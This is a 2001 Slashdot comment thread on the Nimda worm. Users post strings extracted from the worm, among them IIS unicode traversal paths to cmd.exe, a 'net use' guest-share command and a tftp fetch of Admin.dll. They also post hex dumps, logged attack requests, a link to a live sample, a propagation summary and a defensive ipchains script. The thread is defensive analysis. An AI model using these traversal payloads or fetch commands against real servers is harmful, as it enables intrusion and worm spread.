    /scripts/..%%35%63..
    /scripts/..%%35c..
    /scripts/..%25%35%63..
    /scripts/..%252f..
    /root.exe?/c+
    /winnt/system32/cmd.exe?/c+
    net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
    tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
    Admin.dll
    c:\Admin.dll
    d:\Admin.dll
    e:\Admin.dll
    window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
    /Admin.dll

    qusery9bnow
    -qusery9bnow
    \mmc.exe
    \riched20.dll
    boot
    Shell
    explorer.exe load.exe -dontrunold
    \system.ini
    \load.exe

  • I wasn't able to get to Security Focus to see what they had on this but I was able to get to CERT. They have this on their current activity page [cert.org].

    As of now there's not much more information there than is in the story already.

    Other than the Code Red II backdoor it looks like it's mainly trying to exploit the unicode url hole [cert.org].
  • It doesn't seem to execute under Windows 2000. When the payload attempted to run, it failed and a Dr. Watson error occurred.

    _Very_ nasty, until IE 5 is patched!
  • smtp strings
    mime stuff
    mapi stuff
    winzip
    http stuff
    richtext dll stuff
    hidden shares stuff
    webserver sploits
    net use stuff
    Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
  • by DirkGently (32794) <dirk@lemonge c k o . org> on Tuesday September 18, 2001 @12:04PM (#2315072) Homepage
    ...try this. its a pretty quick hack, and you'll need to modify the path to your apache logs in the grep line. but its what I just whipped up. hope its useful. I just ran it and it works for me.

    #!/bin/sh

    for LUSER in `grep "winnt" /var/log/httpd/error_log | awk '{print $8}' | sed -e s/]//`; do
    if [ ! "`ipchains -L -n | grep $LUSER`" ]
    then ipchains -A input -s $LUSER -d 0/0 -j DENY
    fi
    done

  • by fmaxwell (249001) on Tuesday September 18, 2001 @12:14PM (#2315129) Homepage Journal
    Microsoft has cost ISPs, businesses, and end users an incalculable amount of money and frustration and it is all due to their negligence. They were negligent when they created software and technologies that are so easily exploited. They were negligent in their testing of their products. They were negligent in not sending patch CDs through the mail to registered users. If they can send you upgrade offers via the mail, they can send you patch CDs to repair their defective products.

    And before anyone starts quoting the Microsoft license, ISPs that run Linux/*BSD/Solaris are being hurt by the traffic, too. They have no license with Microsoft and they've been injured by Microsoft's negligence.

    I'd like to see AOL, Earthlink, or some other big ISP take Microsoft's corporate butt to court, demanding compensatory and punitive damages for Microsoft's negligence.
    • Not only has this a result of negligence but also a result of false claims that their products are just as secure as Unix, just a robust as Unix, and just as fast as Unix. They've mislead consumers regarding by funding biased comparisons, flawed white papers, and paid-customer endorsements. I believe this is nothing short of fraud.
    • They were negligent when they created software and technologies that are so easily exploited.

      No. Users were negligent in purchasing and deploying software that was already known ahead of time, to be defective.

      Microsoft's reputation is well established. Ignorance is no excuse.

  • It's sitting at http://www.initialized.org/virus/readme.eml if anyone wants to take a peak at it...

    *DO NOT OPEN IT IN INTERNET EXPLORER.*
  • The best site to track this incident IMO (incidents.org) now has a pretty good picture of what's going on from a technical perspective.

    A short summary:

    The Nimda worm is now known to propogate four ways:

    (1) An IIS vulnerability propagation mechanism where the worm attempts to exploit a large number of IIS vulnerabilities to gain control of a victim IIS server. Once in control, the worm uses tftp to fetch its code in a file called Admin.dll from the attacking server.

    (2) Email propogation. The worm harvests email addresses from the address book and potentially the web browser history and sends itself to all addresses as an attachment called readme.exe. These executables are automatically executed if the receipient who opens (or previews) the email is running Internet Explorer 5 or 6. Note that the worm may spoof the source address on the emails.

    (3) When a web server is infected, the worm replaces all web pages on the server with a binary encoded as a wav file, which can infect each client that connects to the server. The wav file is called readme.eml. Microsoft Internet Explorer 5.0 and higher will automatically execute the malicious file.

    (4) The worm is network aware and propagates via open shares. It will propagate to shares that are accessible to username guest with no password.

    See: www.incidents.org/react/nimda.php [incidents.org] for the full details.

    - YASP (Yet Another Security Professional) who is fighting this pretty heavily at work - nothing here infected, of course, but the traffic itself is threatening to become a pretty nice distributed DOS - our Internet Router (a decently-hefty CSCO 6500-series) is sitting at ~60% processor utilization.
  • by TrentC (11023) on Tuesday September 18, 2001 @07:25PM (#2317975) Homepage
    I was digging thru my logs when I found this entry (note the date)...

    207.##.###.# - - [02/Apr/2001:03:15:00 -0700] "GET /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af. .%c0%af..%c0%af..%c0%af/winnt/system32/
    cmd.exe?/c%20dir HTTP/1.0" 404 329


    So it looks like someone was giving this one a dry run several months ago...

    Jay (=
  • by mglcel (154821) on Tuesday September 18, 2001 @07:33PM (#2318006)
    sorry for the last ugry post, bad manipulation.

    I've received a mail, with an attached file readme.exe declared as mime format audio/x-wav.

    after hexadecimal dump, i've noticed this string :

    000090c0 6e 74 65 72 66 61 63 65 73 00 00 00 43 6f 6e 63 |nterfaces...Conc|
    000090d0 65 70 74 20 56 69 72 75 73 28 43 56 29 20 56 2e |ept Virus(CV) V.|
    000090e0 35 2c 20 43 6f 70 79 72 69 67 68 74 28 43 29 32 |5, Copyright(C)2|
    000090f0 30 30 31 20 20 52 2e 50 2e 43 68 69 6e 61 00 00 |001 R.P.China..|

    "Concept Virus(CV) V.5, Copyright(C)2001 R.P.China"

    in the code i can found :

    00009b20 2f 5f 76 74 69 5f 62 69 6e 2f 2e 2e 25 32 35 35 |/_vti_bin/..%255| 00009b30 63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e |c../..%255c../..|
    00009b40 25 32 35 35 63 2e 2e 00 2f 5f 6d 65 6d 5f 62 69 |%255c.../_mem_bi| 00009b50 6e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 |n/..%255c../..%2|

    _vti_bin and _mem_bin are part of my apache access logs :
    213.195.72.2 - - [18/Sep/2001:23:57:27 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 249 213.195.72.2 - - [18/Sep/2001:23:57:27 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 249 major part of the mail can be found in the hex dump as :
    000092a0 0d 0a 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e |....|
    000092b0 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 20 62 67 43 |.| 00092d0 0a 3c 69 66 72 61 6d 65 20 73 72 63 3d 33 44 63 |.....--| which is the code of the html part of the mail,

    or :
    00009350 37 38 39 30 44 45 46 5f 3d 3d 3d 3d 0d 0a 43 6f |7890DEF_====..Co|
    00009360 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 75 64 69 |ntent-Type: audi| 00009370 6f 2f 78 2d 77 61 76 3b 0d 0a 09 6e 61 6d 65 3d |o/x-wav;...name=| 00009380 22 72 65 61 64 6d 65 2e 65 78 65 22 0d 0a 43 6f |"readme.exe"..Co| 00009390 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 |ntent-Transfer-E| 000093a0 6e 63 6f 64 69 6e 67 3a 20 62 61 73 65 36 34 0d |ncoding: base64.| 000093b0 0a 43 6f 6e 74 65 6e 74 2d 49 44 3a 20 3c 45 41 |.Content-ID: .......| which corresponds to the mail :
    I 3 readme.exe [audio/x-wav, base64, 75K] (mutt output) I'm not a virus expert, but if somebody is interested by the readme.exe code or more informations, please mail mglcel@gcu-squad.org. I've sent a mail to mc-afee support to learn if they know this worm, Concept(CV).
  • URLScan (Score:5, Informative)

    by Pinball Wizard (161942) on Tuesday September 18, 2001 @07:42PM (#2318037) Homepage Journal
    I just found a very interesting tool at Microsoft's website, UrlScan [microsoft.com]. It is able to identify malformed requests, and thus is able to prevent against future, unknown worms. It discards the requests before they can be executed.


    Anyone know if something like this exists for Apache? A tool like this, if widespread, could effectively contain future buffer-overrun type attacks.

Any given program, when running, is obsolete.

Working...